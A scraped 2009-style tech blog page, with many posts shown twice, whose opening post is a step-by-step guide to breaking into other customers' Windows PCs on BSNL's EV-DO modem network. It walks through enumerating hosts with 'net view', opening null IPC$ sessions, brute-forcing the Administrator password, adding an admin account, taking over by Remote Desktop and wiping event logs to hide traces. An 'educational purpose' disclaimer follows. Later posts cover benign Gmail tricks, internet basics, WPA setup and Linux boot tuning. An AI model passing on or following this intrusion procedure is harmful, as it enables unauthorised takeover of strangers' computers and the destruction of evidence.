BSNL is a Government body now been privatised that offers Telecommunication and Broadband services in India. It also offers USB Modem for both rental and for owning. This hack works on almost all the USB Modems ( ZTE EV-DO ) provided by BSNL. EVDO is a Technology short for " Evolution - Data only " that uses 3G Technology introduced by Qualcomm. Here i am going to share how to eavesdrop into someones Network who are using BSNL EV-DO, and using this trick you can entirely take control of the box.
This hack works only with Windows based Boxes. Step 1 :
Install the Driver required for BSNL ZTE EV-DO Modem, as a part of the installation, it will prompt you to plug-in the device, then change the default username and password, then connect to the internet. Step 2 :
While the modem is connected to the internet, open up a command prompt and type " Net View "
command in it, then it will display all the names of the machines that are connected to the same network that uses the similar device ( EV-DO ). It will blindly display the hostnames that are a part in that network, but it wont show whether the connected machines are alive or not. Here is list of hostnames that was available when i was dealing with this, let it be a POC.
Step 3:
Now the major part is to find a host that is alive, and this can be done both manually and
also by using automated Batch program, once you got the host that is alive, you can connect to
its hidden IPC$ ( Inter Process Connect ) share by using the below command, Net use \\IP- Address\IPC$ "" in my case i used the following.....
So this will establish a NULL session with the target host that i have used, now the target system and my computer is connected, and by using we have to move further...
Step 4:
Now to check whether there is connection between your computer and the target, just type the below command, net use This will reveal the current connections..... Step 5: In every windows based boxes, there must be an Administrator account, few of them will never set a password for default administrator account, and only few will do it. Now we are trying to gain Administrator access to the remote box, and this can be done by using Dictionary attack or by Launching Brute Force attack against the target.
You can compromise admin account by using Dictionary attack, and you can use the "LAN Remote
user - Dictionary Attack" Check with the syntax properly before starting..... Step 6:
Once you obtained the password of the administrator account, you can use the same net command
to establish a connection with administrator rights.... Net use \\IP-Address\sharename "password" /user:administrator once you got the message "Command Completed Successfully" then you are connected to the target
machine with admin access. Step 7:
Now goto run and type "compmgmt.msc", this will take you to the Computer management, Click on
Action -> Connect to another computer.... and then type in the IP address or the Hostname of
the target machine. Once you got access to the remote host, now you can see the computer management(Local) changes
to the Computer Management(XXX.XXX.XXX.XXX) - Remote IP. Step 8:
You can now create a New user account on the remote machine by expanding the Local users and
Groups -> users -> right click there and create a new user and assign Admin rights. Step 9:
Now you can start a Terminal Session to the remote host, or you can just start a Remote desktop connection, goto run and type MSTSC and hit enter. Step 10:
Type in the Ip address of the remote host in the Remote Desktop connection wizard and take over the compter. Step 11:
To cover the traces just clear all the logs in the eventviewer in the target by using the computer management itself, also make sure to delete the IPC$ connection logs by using the command Net use \\IP- Address\IPC$ /delete This is a high Potential Security threat... because anyone can easily gain control over the computer accross the network and can root them, Make them Zombies and later as botnets and so on. Step 12:
To avoid being a victim to such kind of attacks, you can read the aticle by Clicking here . Disclaimer :-
This is only meant for Educational purpose, The author nor the publisher takes No Responsibilty for any illegal activity.
Showing posts with label internet. Show all posts
Showing posts with label internet. Show all posts
Monday, September 14, 2009
Saturday, September 12, 2009
5 Other Uses Of Gmail Other Than Email
1. Use Gmail As A Free Online File Format Converter
If you want to convert any office document to HTML format , think of nothing other than Gmail .
You don't have to install third- party application like PDF 2HTML or Adobe Acrobat for this. You can convert doc, xls, ppt, rtf, pdf files and the new Microsoft Office 2007 formats like docx, xlsx and pptx to HTML , absolutely free by using Gmail.
Just attach the document to a mail and send it to yourself. When you receive the mail open it and click "View as HTML".
2 . Use Gmail As An MP3 Player
If you want to try out a new audio player, try Gmail!
Send an mp3 file to yourself and see that Gmail contains an option to play it . Clicking it will open a flash MP3 player using which you can play the song without downloading it.
3. Use Gmail As Your OpenID
You can use your Google account username and password to login at a number of sites like Zoho and Plaxo . But what about the sites that accepts only a URL as an OpenID field?
Welcome to openid- provider.appspot.com . This site, built on Google App Engine, allows you to create a OpenID URL from your Google Account Credentials. Login with your Gmail username and password and the site will provide you a URL like http://openid- provider.appspot.com/, which you can use on regular OpenID accepting sites.
4. Use Gmail As Your Online StorageGmail provides a virtually unlimited online space that normal users find impossible to fill up with emails alone. So why not use the remaining space as your personal online file storage area?
GMail Drive is a shell extension for Windows that adds the Gmail storage as a disk in My Computer. All operations that you normally do with a regular hard drive - copy, paste, drag and drop, works for Gmail drive too. Just that the data is not residing in your computer but high up in Google clouds.
Linux users can try out GmailFS which provides similar functionality as GMail Drive in windows. Using this tool, you can mount your Gmail storage space as a file system and transfer files between them just like any other disks.
5. Use Gmail To Play Snakey
If all that emails are making you bored, try the game that comes packed with Gmail.
Gmail labs contains a game - Old Snakey , that you first need to enable from the settings pane in order to play. Go to Gmail settings -> Labs and set the Old Snakey radio button to enabled. Now, return back to inbox and hit the '&' key to start the game.
If you want to convert any office document to HTML format , think of nothing other than Gmail .
You don't have to install third- party application like PDF 2HTML or Adobe Acrobat for this. You can convert doc, xls, ppt, rtf, pdf files and the new Microsoft Office 2007 formats like docx, xlsx and pptx to HTML , absolutely free by using Gmail.
Just attach the document to a mail and send it to yourself. When you receive the mail open it and click "View as HTML".
2 . Use Gmail As An MP3 Player
If you want to try out a new audio player, try Gmail!
Send an mp3 file to yourself and see that Gmail contains an option to play it . Clicking it will open a flash MP3 player using which you can play the song without downloading it.
3. Use Gmail As Your OpenID
You can use your Google account username and password to login at a number of sites like Zoho and Plaxo . But what about the sites that accepts only a URL as an OpenID field?
Welcome to openid- provider.appspot.com . This site, built on Google App Engine, allows you to create a OpenID URL from your Google Account Credentials. Login with your Gmail username and password and the site will provide you a URL like http://openid- provider.appspot.com/, which you can use on regular OpenID accepting sites.
4. Use Gmail As Your Online StorageGmail provides a virtually unlimited online space that normal users find impossible to fill up with emails alone. So why not use the remaining space as your personal online file storage area?
GMail Drive is a shell extension for Windows that adds the Gmail storage as a disk in My Computer. All operations that you normally do with a regular hard drive - copy, paste, drag and drop, works for Gmail drive too. Just that the data is not residing in your computer but high up in Google clouds.
Linux users can try out GmailFS which provides similar functionality as GMail Drive in windows. Using this tool, you can mount your Gmail storage space as a file system and transfer files between them just like any other disks.
5. Use Gmail To Play Snakey
If all that emails are making you bored, try the game that comes packed with Gmail.
Gmail labs contains a game - Old Snakey , that you first need to enable from the settings pane in order to play. Go to Gmail settings -> Labs and set the Old Snakey radio button to enabled. Now, return back to inbox and hit the '&' key to start the game.
Unlock Yahoo when Account is Blocked
This is a very easy but an awesome Trick. When you or someone else enters an incorrect login multiple times then Yahoo! locks the account for "security reasons" and you are unable to access your chat names. Cool thing is that, these are a piece of cake to unlock. All you need is a list of Yahoo servers to log in with. Every time you login, you are using what's called a server to access yahoo. You login with a cookie, which is sort of like an information packet or ID proving that you are who you claim to be, and the account is yours. When people attempt to log your name in multiple times with a locking tool, all they are doing is logging in over and over with an incorrect password until your cookie expires, which means you will no longer be allowed to login. So, when you find yourself locked, what you need to do is refresh your cookie. But how can you do that when the yahoo server you were using has blocked you? Simple, find another server. Yahoo has servers all over the place. There are more than I'd care to count. I'll include a pretty decent sized list with this tutorials. All you have to do is paste one of these servers in your browser and log in on the page you see. Unless you have been locked on that server as well, you will receive a fresh cookie and will be able to log in to messenger again. Tons of people try to go through their email and login there to unlock an account, but a smart locker will shut down your mail server first, then cut off your chat server. Most people don't know what to do if the email is blocked, so they give up trying. That's why I don't even bother with the email method. I simply pick another server, log in, and I'm good to go. There are so many servers out there that it is impossible to lock them all. Even if they could, the lock is only for about 12 hours, and then you're back in business. Some Yahoo Servers : http://cn.mail.yahoo.com/?id= 77070 CHINA
http://edit.india.yahoo.com/conf ig/mail?.intl=in INDIA
http://edit.europe.yahoo.com/ config/mail?.intl=uk EUROPE/UK
http://login.yahoo.com/config/m ail?.intl=cf FRENCH CANADIAN
http://my.yahoo.co.jp/ JAPAN
http://login.yahoo.com/config/l ogin USA Yahoo Chat Logins : http://hk.chat.yahoo.com/?my Home HK
http://tw.chat.yahoo.com/?my Home Taiwan
http://in.chat.yahoo.com/?myH ome India
http://chat.yahoo.co.jp/?myHome Japan
http://chat.yahoo.co.jp/?myHome Korea
http://sg.chat.yahoo.com/?my Home Singapore
http://chinese.chat.yahoo.co m/?myHome Chinese
http://cn.chat.yahoo.com/?my Home China
http://asia.chat.yahoo.com/? myHome Asia
http://au.chat.yahoo.com/?my Home Australia & Nz
http://dk.chat.yahoo.com/ Denmark
http://fr.docs.yahoo.com/chat/ chatbylycos.html France
http://de.docs.yahoo.com/chat /chatbylycos.html Germany
http://it.docs.yahoo.com/chat/ chat.html Italy
http://no.chat.yahoo.com/ Norway
http://es.docs.yahoo.com/chat/ chatbylycos.html Spain
http://se.chat.yahoo.com/ Sweden
http://uk.docs.yahoo.com/chat /chatbylycos.html Uk & Ireland
http://ar.chat.yahoo.com/?my Home Argentina
http://br.chat.yahoo.com/?my Home Brazil
http://espanol.chat.yahoo.co m/?myHome South America
http://mx.chat.yahoo.com/?m yHome Mexico
http://ca.chat.yahoo.com/?my Home Canada
http://world.yahoo.com/ World of yahoo Cheers and Keep learning..
http://edit.india.yahoo.com/conf ig/mail?.intl=in INDIA
http://edit.europe.yahoo.com/ config/mail?.intl=uk EUROPE/UK
http://login.yahoo.com/config/m ail?.intl=cf FRENCH CANADIAN
http://my.yahoo.co.jp/ JAPAN
http://login.yahoo.com/config/l ogin USA Yahoo Chat Logins : http://hk.chat.yahoo.com/?my Home HK
http://tw.chat.yahoo.com/?my Home Taiwan
http://in.chat.yahoo.com/?myH ome India
http://chat.yahoo.co.jp/?myHome Japan
http://chat.yahoo.co.jp/?myHome Korea
http://sg.chat.yahoo.com/?my Home Singapore
http://chinese.chat.yahoo.co m/?myHome Chinese
http://cn.chat.yahoo.com/?my Home China
http://asia.chat.yahoo.com/? myHome Asia
http://au.chat.yahoo.com/?my Home Australia & Nz
http://dk.chat.yahoo.com/ Denmark
http://fr.docs.yahoo.com/chat/ chatbylycos.html France
http://de.docs.yahoo.com/chat /chatbylycos.html Germany
http://it.docs.yahoo.com/chat/ chat.html Italy
http://no.chat.yahoo.com/ Norway
http://es.docs.yahoo.com/chat/ chatbylycos.html Spain
http://se.chat.yahoo.com/ Sweden
http://uk.docs.yahoo.com/chat /chatbylycos.html Uk & Ireland
http://ar.chat.yahoo.com/?my Home Argentina
http://br.chat.yahoo.com/?my Home Brazil
http://espanol.chat.yahoo.co m/?myHome South America
http://mx.chat.yahoo.com/?m yHome Mexico
http://ca.chat.yahoo.com/?my Home Canada
http://world.yahoo.com/ World of yahoo Cheers and Keep learning..
Guide To Internet Part 2
For example, a document created in Microsoft Word can be attached to an e-mail message and retrieved by the recipient with the appropriate e-mail program. Many e-mail programs, including Eudora,Netscape Messenger, and Microsoft Outlook, offer the ability to read files written in HTML, which is itself a MIME type.
TELNETTelnet is a program that allows you to log into computers on the Internet and use online databases, library catalogs, chat services, and more. There are no graphics in Telnet sessions, just text. To Telnet to a computer, you must know its address. This can consist of words (locis.loc.gov) or numbers ( 140.147.254.3 ). Some services require you to connect to a specific port on the remote computer. In this case, type the port number after the Internet address. Example: telnet nri.reston.va.us 185.
Telnet is available on the World Wide Web. Probably the most common Web-based resources available through Telnet have been library catalogs, though most catalogs have since migrated to the Web. A link to a Telnet resource may look like any other link, but it will launch a Telnet session to make the connection. A Telnet program must be installed on your local computer and configured to your Web browser in order to work.
With the increasing popularity of the Web, Telnet has become less frequently used as a means of access to information on the Internet.
FTPFTP stands for File Transfer Protocol. This is both a program and the method used to transfer files between computers. Anonymous FTP is an option that allows users to transfer files from thousands of host computers on the Internet to their personal computer account. FTP sites contain books, articles, software, games, images, sounds, multimedia, course work, data sets, and more.
If your computer is directly connected to the Internet via an Ethernet cable, you can use one of several PC software programs, such as WS_FTP for Windows, to conduct a file transfer.
FTP transfers can be performed on the World Wide Web without the need for special software. In this case, the Web browser will suffice. Whenever you download software from a Web site to your local machine, you are using FTP. You can also retrieve FTP files via search engines such as FtpFind, located at / http://www.ftpfind.com/. This option is easiest because you do not need to know FTP program commands.
E-MAIL DISCUSSION GROUPSOne of the benefits of the Internet is the opportunity it offers to people worldwide to communicate via e-mail. The Internet is home to a large community of individuals who carry out active discussions organized around topic-oriented forums distributed by e-mail. These are administered by software programs. Probably the most common program is the listserv.
A great variety of topics are covered by listservs, many of them academic in nature. When you subscribe to a listserv, messages from other subscribers are automatically sent to your electronic mailbox. You subscribe to a listserv by sending an e-mail message to a computer program called a listserver. Listservers are located on computer networks throughout the world. This program handles subscription information and distributes messages to and from subscribers. You must have a e- mail account to participate in a listserv discussion group. Visit Tile.net at / http://tile.net/ to see an example of a site that offers a searchablecollection of e-mail discussion groups.
Majordomo and Listproc are two other programs that administer e-mail discussion groups. The commands for subscribing to and managing your list memberships are similar to those of listserv.
USENET NEWSUsenet News is a global electronic bulletin board system in which millions of computer users exchange information on a vast range of topics. The major difference between Usenet News and e- mail discussion groups is the fact that Usenet messages are stored on central computers, and users must connect to these computers to read or download the messages posted to these groups. This is distinct from e-mail distribution, in which messages arrive in the electronic mailboxes of each list member.
Usenet itself is a set of machines that exchanges messages, or articles, from Usenet discussion forums, called newsgroups. Usenet administrators control their own sites, and decide which (if any) newsgroups to sponsor and which remote newsgroups to allow into the system.
There are thousands of Usenet newsgroups in existence. While many are academic in nature, numerous newsgroups are organized around recreational topics. Much serious computer- related work takes place in Usenet discussions. A small number of e-mail discussion groups also exist as Usenet newsgroups.
The Usenet newsfeed can be read by a variety of newsreader software programs. For example, the Netscape suite comes with a newsreader program called Messenger. Newsreaders are also available as standalone products.
FAQ, RFC, FYIFAQ stands for Frequently Asked Questions. These are periodic postings to Usenet newsgroups that contain a wealth of information related to the topic of the newsgroup. Many FAQs are quite extensive. FAQs are available by subscribing to individual Usenet newsgroups. A Web-based collection of FAQ resources has been collected by The Internet FAQ Consortium and is available at / http://www.faqs.org/.
RFC stands for Request for Comments. These are documents created by and distributed to the Internet community to help define the nuts and bolts of the Internet.
TELNETTelnet is a program that allows you to log into computers on the Internet and use online databases, library catalogs, chat services, and more. There are no graphics in Telnet sessions, just text. To Telnet to a computer, you must know its address. This can consist of words (locis.loc.gov) or numbers ( 140.147.254.3 ). Some services require you to connect to a specific port on the remote computer. In this case, type the port number after the Internet address. Example: telnet nri.reston.va.us 185.
Telnet is available on the World Wide Web. Probably the most common Web-based resources available through Telnet have been library catalogs, though most catalogs have since migrated to the Web. A link to a Telnet resource may look like any other link, but it will launch a Telnet session to make the connection. A Telnet program must be installed on your local computer and configured to your Web browser in order to work.
With the increasing popularity of the Web, Telnet has become less frequently used as a means of access to information on the Internet.
FTPFTP stands for File Transfer Protocol. This is both a program and the method used to transfer files between computers. Anonymous FTP is an option that allows users to transfer files from thousands of host computers on the Internet to their personal computer account. FTP sites contain books, articles, software, games, images, sounds, multimedia, course work, data sets, and more.
If your computer is directly connected to the Internet via an Ethernet cable, you can use one of several PC software programs, such as WS_FTP for Windows, to conduct a file transfer.
FTP transfers can be performed on the World Wide Web without the need for special software. In this case, the Web browser will suffice. Whenever you download software from a Web site to your local machine, you are using FTP. You can also retrieve FTP files via search engines such as FtpFind, located at / http://www.ftpfind.com/. This option is easiest because you do not need to know FTP program commands.
E-MAIL DISCUSSION GROUPSOne of the benefits of the Internet is the opportunity it offers to people worldwide to communicate via e-mail. The Internet is home to a large community of individuals who carry out active discussions organized around topic-oriented forums distributed by e-mail. These are administered by software programs. Probably the most common program is the listserv.
A great variety of topics are covered by listservs, many of them academic in nature. When you subscribe to a listserv, messages from other subscribers are automatically sent to your electronic mailbox. You subscribe to a listserv by sending an e-mail message to a computer program called a listserver. Listservers are located on computer networks throughout the world. This program handles subscription information and distributes messages to and from subscribers. You must have a e- mail account to participate in a listserv discussion group. Visit Tile.net at / http://tile.net/ to see an example of a site that offers a searchablecollection of e-mail discussion groups.
Majordomo and Listproc are two other programs that administer e-mail discussion groups. The commands for subscribing to and managing your list memberships are similar to those of listserv.
USENET NEWSUsenet News is a global electronic bulletin board system in which millions of computer users exchange information on a vast range of topics. The major difference between Usenet News and e- mail discussion groups is the fact that Usenet messages are stored on central computers, and users must connect to these computers to read or download the messages posted to these groups. This is distinct from e-mail distribution, in which messages arrive in the electronic mailboxes of each list member.
Usenet itself is a set of machines that exchanges messages, or articles, from Usenet discussion forums, called newsgroups. Usenet administrators control their own sites, and decide which (if any) newsgroups to sponsor and which remote newsgroups to allow into the system.
There are thousands of Usenet newsgroups in existence. While many are academic in nature, numerous newsgroups are organized around recreational topics. Much serious computer- related work takes place in Usenet discussions. A small number of e-mail discussion groups also exist as Usenet newsgroups.
The Usenet newsfeed can be read by a variety of newsreader software programs. For example, the Netscape suite comes with a newsreader program called Messenger. Newsreaders are also available as standalone products.
FAQ, RFC, FYIFAQ stands for Frequently Asked Questions. These are periodic postings to Usenet newsgroups that contain a wealth of information related to the topic of the newsgroup. Many FAQs are quite extensive. FAQs are available by subscribing to individual Usenet newsgroups. A Web-based collection of FAQ resources has been collected by The Internet FAQ Consortium and is available at / http://www.faqs.org/.
RFC stands for Request for Comments. These are documents created by and distributed to the Internet community to help define the nuts and bolts of the Internet.
Guide to Internet part 1
Internet Guide : A Basic Guide
The Internet is a computer network made up of thousands of networks worldwide. No one knows exactly how many computers are connected to the Internet. It is certain, however, that these number in the millions.
No one is in charge of the Internet. There are organizations which develop technical aspects of this network and set standards for creating applications on it, but no governing body is in control. The Internet backbone, through which Internet traffic flows, is owned by private companies.
All computers on the Internet communicate with one another using the Transmission Control Protocol/Internet Protocol suite, abbreviated to TCP/IP. Computers on the Internet use a client/server architecture. This means that the remote server machine provides files and services to the user's local client machine. Software can be installed on a client computer to take advantage of the latest access technology.
An Internet user has access to a wide variety of services: electronic mail,file transfer, vast information resources, interest group membership, interactive collaboration, multimedia displays, real-time broadcasting, shopping opportunities, breaking news, and much more.
The Internet consists primarily of a variety of access protocols. Many of these protocols feature programs that allow users to search for and retrieve material made available by the protocol.
-------------------------------- -------------------------------- ----------------
COMPONENTS OF THE INTERNET
-------------------------------- -------------------------------- ----------------
WORLD WIDE WEBThe World Wide Web (abbreviated as the Web or WWW) is a system of Internet servers that supports hypertext to access several Internet protocols on a single interface. Almost every protocol type available on the Internet is accessible on the Web. This includes e-mail, FTP, Telnet, and Usenet News. In addition to these, the World Wide Web has its own protocol: HyperText Transfer Protocol, or HTTP. These protocols will be explained later in this document.
The World Wide Web provides a single interface for accessing all these protocols. This creates a convenient and user-friendly environment. It is no longer necessary to be conversant in these protocols within separate, command-level environments. The Web gathers together these protocols into a single system. Because of this feature, and because of the Web's ability to work with multimedia and advanced programming languages, the Web is the fastest-growing component of the Internet.
The operation of the Web relies primarily on hypertext as its means of information retrieval. HyperText is a document containing words that connect to other documents. These words are called links and are selectable by the user. A single hypertext document can contain links to many documents. In the context of the Web, words or graphics may serve as links to other documents, images, video, and sound. Links may or may not follow a logical path, as each connection is programmed by the creator of the source document. Overall, the Web contains a complex virtual web of connections among a vast number of documents, graphics, videos, and sounds.
Producing hypertext for the Web is accomplished by creating documents with a language called HyperText Markup Language, or HTML. With HTML, tags are placed within the text to accomplish document formatting, visual features such as font size, italics and bold, and the creation of hypertext links. Graphics and multimedia may also be incorporated into an HTML document. HTML is an evolving language, with new tags being added as each upgrade of the language is developed and released. The World Wide Web Consortium (W3C), led by Web founder Tim Berners-Lee, coordinates the efforts of standardizing HTML. The W3C now calls the language XHTML and considers it to be an application of the XML language standard.
The World Wide Web consists of files, called pages or home pages, containing links to documents and resources throughout the Internet.
The Web provides a vast array of experiences including multimedia presentations, real- time collaboration, interactive pages, radio and television broadcasts, and the automatic "push" of information to a client computer. Programming languages such as Java, JavaScript, Visual Basic, Cold Fusion and XML are extending the capabilities of the Web. A growing amount of information on the Web is served dynamically from content stored in databases. The Web is therefore not a fixed entity, but one that is in a constant state of development and flux.
For more complete information about the World Wide Web, see Understanding The World Wide Web.
E-MAILElectronic mail, or e-mail, allows computer users locally and worldwide to exchange messages. Each user of e-mail has a mailbox address to which messages are sent. Messages sent through e-mail can arrive within a matter of seconds.
A powerful aspect of e-mail is the option to send electronic files to a person's e-mail address. Non-ASCII files, known as binary files, may be attached to e-mail messages. These files are referred to as MIME attachments.MIME stands for Multimedia Internet Mail Extension, and was developed to help e-mail software handle a variety of file types. Read part 2 to continue....
The Internet is a computer network made up of thousands of networks worldwide. No one knows exactly how many computers are connected to the Internet. It is certain, however, that these number in the millions.
No one is in charge of the Internet. There are organizations which develop technical aspects of this network and set standards for creating applications on it, but no governing body is in control. The Internet backbone, through which Internet traffic flows, is owned by private companies.
All computers on the Internet communicate with one another using the Transmission Control Protocol/Internet Protocol suite, abbreviated to TCP/IP. Computers on the Internet use a client/server architecture. This means that the remote server machine provides files and services to the user's local client machine. Software can be installed on a client computer to take advantage of the latest access technology.
An Internet user has access to a wide variety of services: electronic mail,file transfer, vast information resources, interest group membership, interactive collaboration, multimedia displays, real-time broadcasting, shopping opportunities, breaking news, and much more.
The Internet consists primarily of a variety of access protocols. Many of these protocols feature programs that allow users to search for and retrieve material made available by the protocol.
-------------------------------- -------------------------------- ----------------
COMPONENTS OF THE INTERNET
-------------------------------- -------------------------------- ----------------
WORLD WIDE WEBThe World Wide Web (abbreviated as the Web or WWW) is a system of Internet servers that supports hypertext to access several Internet protocols on a single interface. Almost every protocol type available on the Internet is accessible on the Web. This includes e-mail, FTP, Telnet, and Usenet News. In addition to these, the World Wide Web has its own protocol: HyperText Transfer Protocol, or HTTP. These protocols will be explained later in this document.
The World Wide Web provides a single interface for accessing all these protocols. This creates a convenient and user-friendly environment. It is no longer necessary to be conversant in these protocols within separate, command-level environments. The Web gathers together these protocols into a single system. Because of this feature, and because of the Web's ability to work with multimedia and advanced programming languages, the Web is the fastest-growing component of the Internet.
The operation of the Web relies primarily on hypertext as its means of information retrieval. HyperText is a document containing words that connect to other documents. These words are called links and are selectable by the user. A single hypertext document can contain links to many documents. In the context of the Web, words or graphics may serve as links to other documents, images, video, and sound. Links may or may not follow a logical path, as each connection is programmed by the creator of the source document. Overall, the Web contains a complex virtual web of connections among a vast number of documents, graphics, videos, and sounds.
Producing hypertext for the Web is accomplished by creating documents with a language called HyperText Markup Language, or HTML. With HTML, tags are placed within the text to accomplish document formatting, visual features such as font size, italics and bold, and the creation of hypertext links. Graphics and multimedia may also be incorporated into an HTML document. HTML is an evolving language, with new tags being added as each upgrade of the language is developed and released. The World Wide Web Consortium (W3C), led by Web founder Tim Berners-Lee, coordinates the efforts of standardizing HTML. The W3C now calls the language XHTML and considers it to be an application of the XML language standard.
The World Wide Web consists of files, called pages or home pages, containing links to documents and resources throughout the Internet.
The Web provides a vast array of experiences including multimedia presentations, real- time collaboration, interactive pages, radio and television broadcasts, and the automatic "push" of information to a client computer. Programming languages such as Java, JavaScript, Visual Basic, Cold Fusion and XML are extending the capabilities of the Web. A growing amount of information on the Web is served dynamically from content stored in databases. The Web is therefore not a fixed entity, but one that is in a constant state of development and flux.
For more complete information about the World Wide Web, see Understanding The World Wide Web.
E-MAILElectronic mail, or e-mail, allows computer users locally and worldwide to exchange messages. Each user of e-mail has a mailbox address to which messages are sent. Messages sent through e-mail can arrive within a matter of seconds.
A powerful aspect of e-mail is the option to send electronic files to a person's e-mail address. Non-ASCII files, known as binary files, may be attached to e-mail messages. These files are referred to as MIME attachments.MIME stands for Multimedia Internet Mail Extension, and was developed to help e-mail software handle a variety of file types. Read part 2 to continue....
Monday, August 24, 2009
PDF Merger:Merge PDF Files into single File
MergePDF, like what the name suggests, is an online tool that you can use to merge PDF Documents into a single file. If you have multiple, small sized PDF documents that you want combined, you might want to try using this tool.In the website MergePDF
For each process, you are allowed to merge up to 10 PDFs with sizes not exceeding 5MB. If you think that the file size limit is rather small, you’ll have to do it using desktop applicatons such as Acrobat PRO or some other PDF related desktop software. If you’re merging large files, then most probably you don’t want them to be lurking around the internet anyway. Even if MergePDF stated that the files that are uploaded are removed right after the merge process is completed. The only thing that is not safe in itself is the data transfer as we are not transferring through SSL. If our users send us an email requesting SSL, we will happily address that and provide upload over https. This is a neat and simple tool for doing a simple task and it won’t cost you anything. It merges PDFs, no manipulating no editing,that’s as simple as it gets.
For each process, you are allowed to merge up to 10 PDFs with sizes not exceeding 5MB. If you think that the file size limit is rather small, you’ll have to do it using desktop applicatons such as Acrobat PRO or some other PDF related desktop software. If you’re merging large files, then most probably you don’t want them to be lurking around the internet anyway. Even if MergePDF stated that the files that are uploaded are removed right after the merge process is completed. The only thing that is not safe in itself is the data transfer as we are not transferring through SSL. If our users send us an email requesting SSL, we will happily address that and provide upload over https. This is a neat and simple tool for doing a simple task and it won’t cost you anything. It merges PDFs, no manipulating no editing,that’s as simple as it gets.
Saturday, August 22, 2009
How do I secure my wireless network connection with WEP or WPA?
These articles are intended for IT Professionals and administrators with experience servicing computer hardware. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. the authoris not responsible for the use or misuse of this material,including loss of data, damage to hardware, or personal injury.the user is solely responsible
I have just set up a wireless connection at home - whenever I log on it says that the connection is unsecure - how do I secure it? I have a new Toshiba Laptop and a Phillips Router. I saw something about a WEP key....where do I enter this?
You are right to worry about this problem, actually, because any open wireless network is an invitation for neighbors and various unsavory characters to connect to your network as if they were on your local area network. This means that they'd be able to use your network-friendly printer, your networked hard drive backup system, and try to break into your computers too. In addition, they'd be able to use your network connection itself and if they were to download tons of illegal music, for example, the RIAA could get your ISP to shut you down, or if they downloaded porn or terrorism research data, well, the FBI could get involved. Not good!
Fortunately, it's pretty easy to secure a wireless network system: you need to log in to your router / base station (your Phillips unit), which is probably done by simply entering a special IP address in your Web browser (try 192.168.1.1 if the documentation that was included with the router doesn't explain). If that fails, you might need to hook the router directly to the computer via a USB cable, though those are definitely rare systems.
Once you've hooked up, you should find a multi-tab configuration tool that has one tab labeled "Security" or similar. Click on that and you should be able to find "Password" as an option or button. Click on that and it should give the options of WEP or WPA. I recommend that you choose WPA and use a long password - it's far more secure than WEP.
Here's an example from the configuration screen of my Linksys router:
As you can see, it's a bit complicated, but once you enter a password it automatically generates all the scary looking (hexidecimal) security codes: any of those will be what you would enter on your Toshiba laptop -- once -- to be securely connected forever.
I hope that helps you get your hatches battened down!
I have just set up a wireless connection at home - whenever I log on it says that the connection is unsecure - how do I secure it? I have a new Toshiba Laptop and a Phillips Router. I saw something about a WEP key....where do I enter this?
You are right to worry about this problem, actually, because any open wireless network is an invitation for neighbors and various unsavory characters to connect to your network as if they were on your local area network. This means that they'd be able to use your network-friendly printer, your networked hard drive backup system, and try to break into your computers too. In addition, they'd be able to use your network connection itself and if they were to download tons of illegal music, for example, the RIAA could get your ISP to shut you down, or if they downloaded porn or terrorism research data, well, the FBI could get involved. Not good!
Fortunately, it's pretty easy to secure a wireless network system: you need to log in to your router / base station (your Phillips unit), which is probably done by simply entering a special IP address in your Web browser (try 192.168.1.1 if the documentation that was included with the router doesn't explain). If that fails, you might need to hook the router directly to the computer via a USB cable, though those are definitely rare systems.
Once you've hooked up, you should find a multi-tab configuration tool that has one tab labeled "Security" or similar. Click on that and you should be able to find "Password" as an option or button. Click on that and it should give the options of WEP or WPA. I recommend that you choose WPA and use a long password - it's far more secure than WEP.
Here's an example from the configuration screen of my Linksys router:
As you can see, it's a bit complicated, but once you enter a password it automatically generates all the scary looking (hexidecimal) security codes: any of those will be what you would enter on your Toshiba laptop -- once -- to be securely connected forever.
I hope that helps you get your hatches battened down!
Friday, August 21, 2009
10 ways to Tweak your Linux Boot Process
Linux rarely needs to be rebooted. But when it does, it's often slow to boot. Fortunately, there are ways to speed things up. Some of these methods are not terribly difficult. (although some, unfortunately, are). Let's take a look.
#1: Disable unnecessary services
Depending upon the use of the machine, plenty of services won't be needed. Using Linux just for a desktop? Then you won't need sendmail, httpd, and many other services. If your server is only a web server, you can shut off many services as well. To do this, you can go to the Administration menu and take a look at the Services entry. Just deselect all of the services you don't want to start.
#2: Disable unnecessary kernel modules
If your desktop is wired to the Ethernet, you don't need to have a wireless kernel module loaded. This task is a bit more difficult and will require a kernel recompilation, which is not the easiest task to undertake. To do this, you will need the kernel sources. Then, follow the standard steps for compiling a kernel. The difference is that you're going to go through your system and disable all of the modules you don't need. The best way to find out what kernel modules currently install and run on your system is to install Bootchart. Not only will this give you a good list of modules, it will illustrate for you what is happening during your system boot. You can also issue the command chkconfig -list | grep 3:on to find out what services are running. Once you know what loading modules you don't need, you can remove them during a kernel recompilation. While you're at it, compile the kernel to exactly match your architecture.
#3: Use a lightweight window manager instead of GNOME or KDE
I plug smaller footprint window managers for a reason - they drastically reduce graphical boot time. Instead of having to wait that extra 30 to 60 seconds for GNOME or KDE to boot up, why not wait two to 10 seconds for Enlightenment or XFCE to boot up? Not only will they save you boot time, they will save your memory and the headache of dealing with bloatware.
#4: Use a text-based login instead of a graphical login
Most of my Linux machines boot to run level 3 instead of run level 5. This will halt at the text-based login, where I only have to log in and issue startx to start my desktop of choice. The graphical logins do two things: increase load times and create headaches trying to recover from an X windows fubar.
#5: Use a lighter-weight distribution
Instead of loading the heavyweight Fedora, why not try a Gentoo, Arch, or Puppy Linux? The boot times for these smaller distributions are far faster than the more bloated Fedora (and even Ubuntu). Of the larger distributions, OpenSuSE claims to boot the fastest, but I have not personally tested this. Between the latest Fedora and Ubuntu, Ubuntu blows Fedora's boot times away (and that is out of the box).
#6: Use an OpenBIOS
If you're savvy enough to upgrade your PC's firmware, you might consider migrating to an open source BIOS. One caveat to using open firmware is that it allows Linux to actually initialize the hardware as it boots (instead of relying on the BIOS). On top of that, many open BIOSes can be configured to meet your machine's specific needs. If you don't go the open BIOS route, you can at least configure your BIOS to not search for a floppy drive that's not there or to boot directly to the first hard drive (instead of the CD drive first).
#7: Avoid dhcp
If you are working on a home network (or a small business network) where address lease isn't a problem, go with static IP addresses. This will keep your machine from having to call out to a dhcp server to get an IP address. If you take this approach, make sure you configure your /etc/resolve.conf to reflect your DNS server addresses as well.
#8: If you can spare it, get rid of hotplug
